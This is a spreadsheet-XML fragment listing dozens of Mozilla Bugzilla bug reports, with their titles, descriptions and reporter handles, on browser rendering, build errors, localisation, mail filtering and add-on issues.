  </si>
  <si>
    <t>Mozilla 1.1's table cells with small fonts have too much padding when compared
to Mozilla 1.0 IE6 Opera 6.0.3
Attaching HTML and screenshots.</t>
  </si>
  <si>
    <t>karnaze</t>
  </si>
  <si>
    <t>mike.cantrell</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-288973</t>
  </si>
  <si>
    <t>Front page queries are sub-optimized</t>
  </si>
  <si>
    <t>Front page is obviously the most hit one of the entire site hence its SQL
queries should be as optimized as possible.
index.php contains 3 queries wich extract unneeded fields and rows followed by
PHP loops which emulate functionality easily achieved with sane SQL.
Looking at
http://lxr.mozilla.org/mozilla/source/webtools/update/index.php#141
http://lxr.mozilla.org/mozilla/source/webtools/update/index.php#182
and
http://lxr.mozilla.org/mozilla/source/webtools/update/index.php#224
needed changes are easily spotted:
1. don't extract TV.* fields since they are not used
2. put a DISTINCT clause (depending on step 1)
3. add a LIMIT 5 clause
4. eliminate all the PHP code which emulate the above SQL from the data
consuming loops
I'll post a patch as soon as bug #287159 (which work on the same code) is fixed.</t>
  </si>
  <si>
    <t>CORE-492113</t>
  </si>
  <si>
    <t>jsstack error calling TraceRecorder::record_SetPropHit from js_SetPropertyHelper</t>
  </si>
  <si>
    <t>After bug 492059 and bug 492040 were fixed one jsstack error remains:
../../../src/js/src/jsobj.cpp: In function â€˜JSBool js_SetPropertyHelper(JSContext* JSObject* jsid JSBool jsval*)â€™:
../../../src/js/src/jsobj.cpp:4513: error: cannot call JS_REQUIRES_STACK function TraceRecorder::record_SetPropHit(typedef TraceRecorder* typedef JSPropCacheEntry* typedef JSScopeProperty*)
../../../src/js/src/jsobj.cpp:4513: error: cannot call JS_REQUIRES_STACK function js_AbortRecordingImpl(typedef JSContext* typedef char*)
make[2]: *** [jsobj.o] Error 1
As far as I can tell the analysis is correct: is there external knowledge that this codepath cannot be called from trace?
http://hg.mozilla.org/mozilla-central/annotate/98dab8153e42/js/src/jsobj.cpp#l4513</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-470324</t>
  </si>
  <si>
    <t>Funnel data in Omniture not showing since 12/4</t>
  </si>
  <si>
    <t>Looking at our funnel reporting in Omniture I noticed that all fallout reports using our entry page download button and other custom events show virtually zero instances/data.  The problem seems to have begun sometime on Dec. 4th.
Looking into this further there's a likely chance that all of our custom event data/reporting has been off since Dec. 4th.</t>
  </si>
  <si>
    <t>kkovash</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-291771</t>
  </si>
  <si>
    <t>XULRunner</t>
  </si>
  <si>
    <t>Check out toolkit locales for xulrunner fix multiple MOZ_CO_PROJECTs</t>
  </si>
  <si>
    <t>I just tested to check out l10n with 
mk_add_options MOZ_CO_PROJECT=suitexulrunner
mk_add_options MOZ_CO_LOCALES=pl
and this requires two fixes to client.mk patch coming up.</t>
  </si>
  <si>
    <t>CORE-515582</t>
  </si>
  <si>
    <t>Remove unused (and heinous) webservices strings</t>
  </si>
  <si>
    <t>Created attachment 399677
rm
I know it was just cruel fate that made you own these strings but at least it gives you the pleasure of pounding the nail in the coffin of the LOCALIZATION NOTE-free SOAP { %S } %S call resulted in fault: { %S } %S : %S.</t>
  </si>
  <si>
    <t>BUGZILLA-249930</t>
  </si>
  <si>
    <t>authorization_failure error message is not localizable</t>
  </si>
  <si>
    <t>from user-error.html.tmpl:
  [% ELSIF error == authorization_failure %]
    [% title = Authorization Failed %]
    You are not allowed to [% action FILTER html %].
Example usage:
UserInGroup(Param(chartgroup)) 
    || ThrowUserError(authorization_failure 
                     {action =&gt; use this feature})
action ought to be a tag and pick the string as part of the error template</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-495533</t>
  </si>
  <si>
    <t>upgrade Windows reference platform to include Java SE 6 Update 14</t>
  </si>
  <si>
    <t>https://wiki.mozilla.org/ReferencePlatforms/Win32#Java
According to this our Windows reference platform has Java SE 6 Update 10 installed. This is actually used by our tests since we have tests that use the applet tag.
Java SE 6 Update 10 includes an NPAPI-based Java plugin but that Java plugin still uses XPCOM for some things like cookie handling. Java SE 6 Update 14 removes all XPCOM dependencies.
Gecko 1.9.2 will not include support for any parts of the XPCOM plugin API which means that Java SE 6 Update 14 will be the minimum version of Java for Gecko 1.9.2.
We need to upgrade the Windows reference platform so that we can remove all support for the XPCOM plugin API on trunk without breaking tests. We'd like to do this early in the 1.9.2 development cycle which will require all trunk tinderboxes to be upgraded.</t>
  </si>
  <si>
    <t>NSS-325307</t>
  </si>
  <si>
    <t>infinite loop in SECU_FindCrlIssuer</t>
  </si>
  <si>
    <t>The function will be executed indefinitely since the node is not switched to the
next in a list in the while loop body.</t>
  </si>
  <si>
    <t>alvolkov.bgs</t>
  </si>
  <si>
    <t>TOOLKIT-302249</t>
  </si>
  <si>
    <t>typo in checkForAddonUpdates</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050726 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050726 Firefox/1.0+
If the Extension Manager window is opened and the user asks to check for updates
to all extensions through the advanced preferences the Extension Manager
doesn't get the focus. Instead the following error is thrown:
Error: manger is not defined
Source File: chrome://browser/content/preferences/advanced.js
Line: 98
Correcting the spelling at the mentioned place does the job.
Reproducible: Always
Steps to Reproduce:
1. Open Extension Manager
2. Open Firefox Options
3. Check now for updates to extensions and themes
Actual Results:  
Nothing seems to happen.
Expected Results:  
The Extension Manager gets the well deserved focus.</t>
  </si>
  <si>
    <t>ispiked</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-385323</t>
  </si>
  <si>
    <t>Update dom L10n after consistency check with suite L10n</t>
  </si>
  <si>
    <t>After syncing the security/ part of German L10n between my internal suite version and CVS in bug 383713 I'm working on syncing the dom/ part in the same way.
Another huge patch will come soon :)</t>
  </si>
  <si>
    <t>SEAMONKEY-357270</t>
  </si>
  <si>
    <t>Remove useless dots from pref panels (Mousewheel Smart Browsing and Cache)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061019 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061019 SeaMonkey/1.5a
A few UI elements in very few pref panels have ending dots while the rest of the elements don't. And no they are not s... )
Reproducible: Always</t>
  </si>
  <si>
    <t>prometeo.bugs</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-203114</t>
  </si>
  <si>
    <t>find in this file does not work</t>
  </si>
  <si>
    <t>A typo in venkman-views.js prevents the find in this file function from
working in venkman on the trunk.</t>
  </si>
  <si>
    <t>TESTING-371026</t>
  </si>
  <si>
    <t>Reftest</t>
  </si>
  <si>
    <t>reftest: double setTimeout from onload is not late enough for some tests</t>
  </si>
  <si>
    <t>bug 369319 made reftest drawWindow from a setTimeout called from a setTimeout called from an onload hanlder. This is not enough for some tests I was creating (they involve document.loadOverlay - bug 330458).
There should be something similar to mochitest's SimpleTest.waitForExplicitFinish() / SimpleTest.finish() which can be used by tests to indicate they're doing things asynchronous and specify the moment reftest should make a snapshot of the page.
Let me know if this is a bad idea for some reason.</t>
  </si>
  <si>
    <t>CORE-74223</t>
  </si>
  <si>
    <t>crash when a page is autoloaded in the back.</t>
  </si>
  <si>
    <t>Started in 2001033004 or 032914 build for MacOS.
Goto URL.
There is a table that has several links in the middle of the page.
Open in a new window the Click link in the 5th row(4th link item from the top
of the table) which has a linke below:
http://www.kent-web.com/chat/sample/yychat.cgi
Switch window back to the first one.
Wait for reloads to happen in the second window.
Result:Crash after several reloads.</t>
  </si>
  <si>
    <t>beard</t>
  </si>
  <si>
    <t>tarahim</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-282447</t>
  </si>
  <si>
    <t>NPE trying to report error when trying to convert null to primitive type</t>
  </si>
  <si>
    <t>User-Agent:       Opera/7.54 (Windows NT 5.0 U)  [en]
Build Identifier: 
When null is attempted to be passed as a parameter argument to a Java method 
taking primitive type Rhino attempts to report this as error. However the 
error reporting itself fails with:
java.lang.NullPointerException
        at org.mozilla.javascript.NativeJavaObject.
reportConversionError(NativeJavaObject.java:896)
        at org.mozilla.javascript.NativeJavaObject.
coerceTypeImpl(NativeJavaObject.java:505)
...
I won't bother submitting a patch for this as it's trivial. Just change value.
toString() to String.valueOf(value) in NativeJavaObject.
reportConversionError() method.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>szegedia</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-359592</t>
  </si>
  <si>
    <t>Cleanup chatzilla.dtd</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061105 SeaMonkey/1.5a
Build Identifier: 
A few suggestions:
1) remove unused/empty strings
2) rename . to accesskeys to akey make life easier for translators' tools
3) use a single name for ChatZilla (eg. rename the various Chatzilla chatzilla Cz CZ etc.)
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-316414</t>
  </si>
  <si>
    <t>Specify and implement precise steps for clean XPCOM shutdown</t>
  </si>
  <si>
    <t>The current xpcom-shutdown notification is not sufficient to properly shut down components and XPCOM in a clean way. I have written up http://wiki.mozilla.org/XPCOM_Shutdown to specify a precise set of steps of how to shut down XPCOM cleanly with component loaders and event queues and such. There is some prerequisite and postrequisite work I'd like to do along with this.</t>
  </si>
  <si>
    <t>FIREFOX-364611</t>
  </si>
  <si>
    <t>toggleOfflineStatus in browser.js really shouldn't ask if it can go offline when it wants to go online</t>
  </si>
  <si>
    <t>http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/browser/base/content/browser.js&amp;rev=1.746#4996
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/browser/base/content/browser.js&amp;rev=1.746#5020
As in summary. As far as I can tell it'll send an offline-requested notification even if it's actually going online. It should probably check the observer service's offline state before doing so or something.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-400303</t>
  </si>
  <si>
    <t>Add Camino 1.5.2 to bouncer</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #392222 +++
We're releasing Camino 1.5.2 and would like it to be added to bouncer.
Camino 1.5.2 en-US is http://ftp.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-1.5.2.dmg .
Camino 1.5.2 multilingual is http://ftp.mozilla.org/pub/mozilla.org/camino/releases/all/Camino-1.5.2.dmg .</t>
  </si>
  <si>
    <t>THUNDERBIRD-285606</t>
  </si>
  <si>
    <t>Thunderbird Installer Builds DOA</t>
  </si>
  <si>
    <t>As soon as you try to startup this mornings thunderbird build the main chrome
window is just an entity error dialog.
It looks like there was a locale/branding landing last night that effected
Thunderbird yet I don't believe i was asked to review any of the changes. I'm
not sure how that happened.
cc'ing bsmedberg as this smoketest blocker looks related to Bug #282057. Did you
test this out on windows before it went in?</t>
  </si>
  <si>
    <t>CALENDAR-329415</t>
  </si>
  <si>
    <t>trying to remove exceptions in recurrencedialog with no exceptions selected throws JS-errors</t>
  </si>
  <si>
    <t>If no exception in the recurrenc-edialog is selected and you press 'remove exceptions' you get a JS error:
Error: item has no properties
Source File: chrome://calendar/content/calendar-recurrence-dialog.js
Line: 357</t>
  </si>
  <si>
    <t>robin.edrenius</t>
  </si>
  <si>
    <t>CORE-311022</t>
  </si>
  <si>
    <t>Greasemonkey 0.6.2 exposes window wrapper proliferation when enumerating</t>
  </si>
  <si>
    <t>This is probably a split window bug exposed by the fix for bug 308856.  We see
stacks overflowing via MarkSharpObjects starting with a window.arguments Array
descending through 0 to a window object through its 'window' property to a new
and different flat JSObject for an XPCNativeWrapper for the same native identity
pointer etc. etc.
Somewhere under nsWindowSH::GetProperty we are rewrapping when we should be
finding a native wrapper.
Or perhaps we're doing some outer=&gt;inner=&gt;outer dance that causes the same result.
/be</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-825598</t>
  </si>
  <si>
    <t>[OTA Update] Download stalls and never recovers when the network connection goes down</t>
  </si>
  <si>
    <t>Seen while updating the stable 12-12 build to the 12-26 build.
STR:
1. Receive the system notification and start downloading the update
2. Leave the phone and let the update finish
3. Come back to black screen.
4. Pull the battery out of the phone - update has now been applied
I have seen this intermittently and the release-drivers thread indicates Hal and Justin have seen it has well. Some have seen it performing nightly updates.
Hal's email comment:
Marcia
I couldn't find that bug to add to it - I had a similar experience:
- started ota wifi update from 20121212 version (with no sim card inserted)
- download quickly progressed to 46.65MB (or some such - I have a screen
shot)
- download never finished (waited over 25 min)
- based on prior update issues I tried power cycling (in the past that
gave the the notification to install)
- no notification presented
- manually checked for update - never returned any status (but buttons
still active)
- version still showed 20121212
- I gave up and figured I'd have to have it reflashed
- I saw your email &amp; pulled battery
- powering on phone it came up with new firmware of 20121226</t>
  </si>
  <si>
    <t>dhylands</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-237095</t>
  </si>
  <si>
    <t>Wrong token counts when re-training against msgs already marked as junk / not junk</t>
  </si>
  <si>
    <t>While doing some tests on the new junk mail controls I discovered a problem
with our token accounting which comes up when a user blows away training.dat and
re-trains against good/bad messages that have already been classified. 
Steps:
1) Remove your training.dat and decide you want to retrain. This will become
very common with the new junk controls which perform best if you retrain.
2) Try to retrain your filters against ham and spam that have already been
classified.
We end up calling nsBayesianFilter::observeMessage
(http://lxr.mozilla.org/seamonkey/source/mailnews/extensions/bayesian-spam-filter/src/nsBayesianFilter.cpp#787)
which gets the current classification and the new classification provided by the
user when they choose Mark as Junk / Mark as Not Junk for re-training.
This method examines the current classification and removes the tokens for this
message from the appropriate training set. We then add the tokens for the
message to the appropriate training set based on the new classification. 
Consider the case where the old classification == the new classification in
conjunction with a user who has just removed his training.dat file for
retraining. This user selects a bunch of messages already marked as junk and
marks them as junk again for re-training purposes. The first message has its
tokens added to the junk training set. Lets say it contained a word like
'Viagra'. The next junk message first removes itself from the training set. Lets
say this 2nd message also contains the word Viagra. We have one token for viagra
with a token count of one from our first message. By removing the tokens for the
2nd message we end up removing the Viagra token. Then the 2nd message tokens get
added back in. Leaving us with a Viagra token with a total message occurrence
count of 1. But it should be 2!!
Extrapolate this scenario out over the course of retraining against already
classified messages and we'll end up with counts of 1 for any tokens shared
amongst the messages! Oh no!</t>
  </si>
  <si>
    <t>SEAMONKEY-95468</t>
  </si>
  <si>
    <t>Folder names display blank initially until resize for the folder pane</t>
  </si>
  <si>
    <t>Used 08-15-08-trunk build
No folder names display on the folder pane for Linux platform
1) Login to the IMAP mail
2) Actual Results: No folder names display on the folder pane
                   (will attach a screen shot as following)
Expected Results: Should display all the folder names on the folder pane.</t>
  </si>
  <si>
    <t>huang</t>
  </si>
  <si>
    <t>CORE-46774</t>
  </si>
  <si>
    <t>clean up nsIFile interface</t>
  </si>
  <si>
    <t>Name of delete should be changed.
What else? As I recall there were a number of issues here.</t>
  </si>
  <si>
    <t>warrensomebody</t>
  </si>
  <si>
    <t>CORE-138489</t>
  </si>
  <si>
    <t>cookies getting lost when space appears in domain= attribute</t>
  </si>
  <si>
    <t>I just upgraded to 1.0 RC 1.  My site uses apache/mod_perl/auth_cookie for
authentication.  When logging in the site sets three cookies.  I turned on
cookie notification and it pops up three times but only the first two cookies
are set.  I don't have this problem with IE or Mozilla 9.9.
I tried setting cookies with a simple perl script using cgi.pm but couldn't
reproduce the problem.  If it helps the piece of perl code in auth_cookie.pm
that sets the cookies looks like:
  $r-&gt;err_headers_out-&gt;add(Set-Cookie =&gt; $cookie)
  $r-&gt;err_headers_out-&gt;add(Set-Cookie =&gt; $cookie2)
  $r-&gt;err_headers_out-&gt;add(Set-Cookie =&gt; $cookie3)
thanks
chad</t>
  </si>
  <si>
    <t>morse</t>
  </si>
  <si>
    <t>bear_phillips</t>
  </si>
  <si>
    <t>FIREFOX-243482</t>
  </si>
  <si>
    <t>Input type=file no display of any 'browse...' button widget not functional</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7b) Gecko/20040421
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a) Gecko/20040512 Firefox/0.8.0+
Using [Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a)
Gecko/20040512 Firefox/0.8.0+]
Try to use the Validate by File Upload field in above mentioned form. On Firefox
(since 20040510 ?) the file upload filed  downs't display the text (expected
'browse...' ) on the button and clicking the button doesn't do nothing.
Reproducible: Always
Steps to Reproduce:
1.Go to http://validator.w3.org/
2.try to upload file for validation click on the button
3.nothing happens
Actual Results:  
The button should display some text ('browse...') clicking on the button should
open a sheet to navigate to a file and allow the user to select a file on the
local file system.
Expected Results:  
display some text (label) on the button and allow the user to upload a file</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-526100</t>
  </si>
  <si>
    <t>Thunderbird</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD</t>
  </si>
  <si>
    <t>[de] Thunderbird 3 landing page localization</t>
  </si>
  <si>
    <t>You will find in bug #526087 instructions about the landing page to be
localized for the Thundebird 3 release planned this quarter.
The file is on the SVN repository in your locale folder preferably commit
directly to SVN and once done inform in this bug.
Alternatively you can attach the files to this bug (either individually or as
a zip archive).
If you attach individual .html files please attach them with the plain/text
Mime format.
News and instructions affecting all locales will be posted and updated if
necessary in the master bug (bug #523583)
Note that this is a very short translation but this is a very visible page (the home page) !
There is one block of text with a link to your local Thunderbird community site
indicated as . 
Thanks!!</t>
  </si>
  <si>
    <t>thomas.lendo</t>
  </si>
  <si>
    <t>CORE-27790</t>
  </si>
  <si>
    <t>linux DND doesn't handle more than one item</t>
  </si>
  <si>
    <t>Right now the linux DND code is limited to one item.  I have a plan to fix this
I'm just opening this bug to track the issue.</t>
  </si>
  <si>
    <t>TOOLKIT-291033</t>
  </si>
  <si>
    <t>Startup and Profile System</t>
  </si>
  <si>
    <t>Enable support for profile temp directory on local filesystem</t>
  </si>
  <si>
    <t>Enable support for profile temp directory on local filesystem
On Windows we want to be able to store the network cache and XUL fastload cache
on the local filesystem.  This means storing data under the user's Local
Settings directory.  The same goes for Mac OSX (~/Library/Caches).
My solution:
 o) Create a temp directory corresponding to each profile directory that can be
    used to store various caches and other volatile data files. 
 o) Only create a lock in the main profile directory.
 o) Make the network cache and XUL fastload service cleanup any files leftover
    in the old location automatically.
Patch coming up...
(I'm filing this bug here because I want to avoid the large CC lists on the
other bugs.  I'll mark them up appropriately once this one is resolved.)</t>
  </si>
  <si>
    <t>BUGZILLA-179184</t>
  </si>
  <si>
    <t>regetlastlist returns all bugs</t>
  </si>
  <si>
    <t>regetlastlist changes $::buffer but then the params object is created from $cgi.
Quick fix - change
my $params = new Bugzilla::CGI($cgi)
to use $::buffer instead
Better fix is to rearrange code a bit pathc coming</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-474499</t>
  </si>
  <si>
    <t>Create security-blog-editors@mozilla mailing list</t>
  </si>
  <si>
    <t>Bug 469817 discusses turning on comments on the mozilla security blog but those comments require an editor to be moderating/approving. Wordpress wants to send those emails to a specific address so it would be nice to create one.
Members:
 - Johnathan
 - Lucas Adamski
 - Brandon Sterne
 - Dan Veditz
 - Melissa Shapiro
 - Nicole Loux
I've warned them that this was coming if any of them want to opt out they can speak up or file follow-ups.</t>
  </si>
  <si>
    <t>CORE-372641</t>
  </si>
  <si>
    <t>Setting text to empty directly inside TABLE leaves a small gap</t>
  </si>
  <si>
    <t>If there is some text directly inside a TABLE (or TBODY or TR) and I remove it by setting the text node's data to the empty string a small gap remains leaving the table asymmetric.  I will attach reftests.</t>
  </si>
  <si>
    <t>CALENDAR-445729</t>
  </si>
  <si>
    <t>Enable compare-locales for Calendar</t>
  </si>
  <si>
    <t>Compare-locales needs a few files to be happy. In particular in preparation for 1.9.1 we're moving the locale data out of client.mk into l10n.ini see bug 445217. Should probably live in calendar/locales/l10n.ini. Not sure if you should have a filter.py next to it to skip some entries that don't need to be localized.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-133974</t>
  </si>
  <si>
    <t>Mozbot</t>
  </si>
  <si>
    <t>[HAVE REVIEW] Mozbot 2.4 Meta Bug</t>
  </si>
  <si>
    <t>Since my tree has so many pending changes here is a complete diff of my whole
tree for the reviewers to get through them quicker.</t>
  </si>
  <si>
    <t>BUGZILLA-527489</t>
  </si>
  <si>
    <t>calls to bz_alter_column on FK referenced columns will lose their referenced status in bz_schema unless the REFERENCES hash is included</t>
  </si>
  <si>
    <t>This affects bugzilla 3.2+
Any calls to bz_alter_schema will overwrite the references section if they are not explicitly included in the call.</t>
  </si>
  <si>
    <t>CALENDAR-482108</t>
  </si>
  <si>
    <t>Invalid alarm for item errors when reading alarms from older releases</t>
  </si>
  <si>
    <t>Created attachment 366175
sample file from sunbird 0.5
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090307 Calendar/1.0pre
When opening or importing an ics file that contains events/tasks created with Sunbird 0.5 many errors occur like:
[JavaScript Error: Invalid alarm for item: df402b62-471d-4936-9467-8128a772f700 (BEGIN:VALARM
TRIGGERVALUE=DURATION:-PT15M
X-MOZ-LASTACK:20090224T155710Z
DESCRIPTION:Mozilla Alarm: dismissed alarm before
ACTION:DISPLAY
END:VALARM
)]
Steps to Reproduce:
1. Start with clean profile
2. Import the attached sample file
3. Check Tools &gt; Error Console
Actual Results:
Error message mentioned above is logged for 8 different events/tasks.
Expected Results:
No errors.</t>
  </si>
  <si>
    <t>CORE-322319</t>
  </si>
  <si>
    <t>WMF Files opened with Windows Media Player Plugin</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051219 SeaMonkey/1.0b
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051219 SeaMonkey/1.0b
WMF and other *.WM* files are handled by Windows Media Player Plugin if no other MIME type mapping (mimeTypes.rdf OS-provided) exists.
Reproducible: Always
Steps to Reproduce:
1. Remove any setting for WMF file type in Windows Explorer and SM Preferences
2. Make sure Windows Media Player Plugin is installed and enabled
3. Send yourself a mail with an attached .wmf file (any contents no need for a real .wmf file)
4. Examine source of received mail
5. Open a local .wmf file in browser
Actual Results:  
Attachment has Content-type: video/x-ms-wm.
Browser opens Media Player for .wmf file.
Expected Results:  
Attachment should have Content-type: application/octet-stream.
Browser should not open any app for a file extension without a MIME type mapping.
Workaround: Add an entry for extension wmf in Preferences|Navigator|Helper Applications
Setting security flag due to WMF vulnerability (shimgvw.dll) reported recently.</t>
  </si>
  <si>
    <t>Franke</t>
  </si>
  <si>
    <t>CORE-211378</t>
  </si>
  <si>
    <t>Unable to paste into editor widgets with middle mouse button</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1)  Start a mail compose window
2)  Select some text somewhere (elsewhere in Mozilla another app does not
    matter) 
3)  Middle-click in the mail composition area
EXPECTED RESULTS:  text is pasted
ACTUAL RESULTS: nothing happens
FURTHER DETAILS:  The problem occurs with both HTML and plaintext composition. 
Middle-mouse-paste into one-line textfields and HTML textareas works fine. 
Middle-mouse-paste into Composer does NOT work (hence the choice of component).
 There are no errors in the JS console no warnings or assertions in a debug
build.  Pasting via Ctrl-C works fine it's just middle-clicking that fails.
I looked over the checkins made in that time period and nothing jumps out at
me... ccing people most likely to have something at all to do with this.</t>
  </si>
  <si>
    <t>kinmoz</t>
  </si>
  <si>
    <t>MARKETING-412602</t>
  </si>
  <si>
    <t>Trademark Violations</t>
  </si>
  <si>
    <t>MARKETING</t>
  </si>
  <si>
    <t>www.descargar-mozilla.com : fake community site to generate adsense</t>
  </si>
  <si>
    <t>http://www.descargar-mozilla.com/  (download mozilla) is a fake community site created to propose firefox+google toolbar</t>
  </si>
  <si>
    <t>liz</t>
  </si>
  <si>
    <t>FIREFOX-442061</t>
  </si>
  <si>
    <t>Extension Compatibility</t>
  </si>
  <si>
    <t>Broken OpenRequest() method in object nsIXMLHttpRequest with latest SDK</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.9) Gecko/2008052906 Firefox/3.0
We have developed an XPCOM Add-On which is being used by many of our customers
for some while now. Our component uses the â€œnsIXMLHttpRequestâ€ object to upload a certain amount of data using POST method.
Since NS_XMLHTTPREQUEST_CONTRACTID has changed with Firefox 3 calls to do_CreateInstance were not working anymore with Gecko SDK 1.8 (our pointer was NULL and error the code was NS_ERROR_NO_INTERFACE).
So we upgraded to latest version (gecko sdk 1.9 built from the official firefox 3 source code). Everything seems ok since we are now able to instanciate successfully our object in Firefox 3.
Yet as soon as call OpenRequest method of that object we get an error.
Here is what the code looks like:
 nsCOMPtr pXMLHttpRequest = NULL
 ...
 pXMLHttpRequest = do_CreateInstance(NS_XMLHTTPREQUEST_CONTRACTID 
 ... (here we just check that rv is OK)
 const nsAString
 nsDependentCString	myUrl = nsDependentCString(url)
 const nsDependentCString
 rv = pXMLHttpRequest-&gt;OpenRequest(myPostString myUrl PR_FALSE emptyStr emptyStr)
 ...
We can compile and run this code but when we call OpenRequest() rv is set to 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) and we're not able anymore to send any data.
Yet the result of do_CreateInstance() looks OK and our url (char *) is correctly initialized (it is printed in a logfile a few lines earlier).
Moreover we made a simple test by calling Abort() method which returns with no error so we assume pXMLHttpRequest is a valid pointer.
This code was working with Firefox 2. Is it a regression ?
Thanks in advance
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>fred.mandrea</t>
  </si>
  <si>
    <t>CORE-239976</t>
  </si>
  <si>
    <t>nsXULElement::GetElementsByAttributeNS (also for nsXULDocument)</t>
  </si>
  <si>
    <t>XUL documents and elements have a getElementsByAttribute() method.  It'd really
be nice to support this for elements with non-null namespaces as well.</t>
  </si>
  <si>
    <t>joerg.bornemann</t>
  </si>
  <si>
    <t>ADD-ON_SDK_GRAVEYARD-653495</t>
  </si>
  <si>
    <t>regexes in script mods and moz-document rules are inconsistent</t>
  </si>
  <si>
    <t>In SDK bug 627386 we landed support for regexes in match patterns  for page mods (i.e. script mods) and in CSS bug 398962 dbaron just landed support for them in -moz-document rules .
But the implementations are different and since we plan to use -moz-document rules to implement style mods they should be the same so identical regexes can be used to specify the pages to which both script and style mods apply.
The restrictions on regexes in -moz-document rules are based on those in the HTML5 pattern attribute .  In particular:
* the pattern must match the entire value not just any subset(somewhat as if
  it implied a ^(?: at the start of the pattern and a )$ at the end)
* the expression is compiled with the global ignoreCase and multiline flags
  disabled.
At first glance we should be able to apply these restrictions to the patterns the SDK accepts for script mods by validating the patterns against the rules and automatically enclosing them in ^(?: and )$.
The only restriction that feels like it might be painful is ignoreCase although I think there's a way to write a regular expression for any URL whose case one wants to ignore.
I don't know whether we could instead loosen the restrictions in -moz-document rules.  Presumably they are partly about fitting patterns into single string values.
dbaron: can you speak to that?
If we decide to implement these restrictions in the SDK we should at least document them in 1.0b5 even if we don't land the implementation by then so we don't break the API later.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-466879</t>
  </si>
  <si>
    <t>Change build script cron job on preview.AMO</t>
  </si>
  <si>
    <t>preview.AMO automatically svn ups off trunk then runs the build script build.sh. With bug 451043 the script has been rewritten in Python so please change the cron job to build.py (all else be equal).
The two scripts should effectively equivalent so if you notice anything out of the ordinary please let me know.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-107300</t>
  </si>
  <si>
    <t>parseIRCURL function should accept the / and ? characters in channel names and not the : char</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:0.9.2)
Gecko/20010726 Netscape6/6.1
BuildID:    20011011
The parseIRCURL() function in static.js (
http://lxr.mozilla.org/mozilla/source/extensions/irc/xul/content/static.js#822 )
does not allow forward slash characters and question marks and allows colons
in channel names which is contrary to the RFC. The characters allowed in channel
names are described in the following extract from RFC 2811 (
http://www.irchelp.org/irchelp/rfc/rfc2811.txt ). 
---------------------------------------------------------------------------
   Apart from the the requirement that the first character being either
   '&amp;' '#' '+' or '!' (hereafter called channel prefix). The only
   restriction on a channel name is that it SHALL NOT contain any spaces
   (' ') a control G (^G or ASCII 7) a comma ('' which is used as a
   list item separator by the protocol).  Also a colon (':') is used as
   a delimiter for the channel mask.  The exact syntax of a channel name
   is defined in IRC Server Protocol [IRC-SERVER].
---------------------------------------------------------------------------
To correct the behaviour of parseIRCURL() the regular expression at line 880 of
the file mentioned above should be changed from: 
        ary = rest.match (/^\/([^\\?\s\/]*)?\/?([^\?]*)?(\?.*)?$/)
to the following: 
        ary = rest.match (/^\/([^\s\cG:]*)?([^\?]*)?(\?.*)?$/)
___________________________________________________________________________
While on the topic of this function it is perhaps also worth changing the
following lines:
887        rv.target = (ary[1]) ? 
888        unescape(ary[1]).toLowerCase().replace(\n \\n): 
889        var params = (ary[2]) ? ary[2].toLowerCase() : 
890        var query = (ary[3]) ? ary[3] : 
to:
887        rv.target = unescape(ary[1]).toLowerCase().replace(\n \\n)
889        var params = ary[2].toLowerCase()
890        var query = ary[3]
If a match isn't made for the contents of capturing brackets then an empty
string is returned. Therefore this change will produce the exact same results
with less code. 
___________________________________________________________________________
Spaces should also not be allowed in a URL so \s characters in lines like the
following should be removed: 
894        rv.isnick =
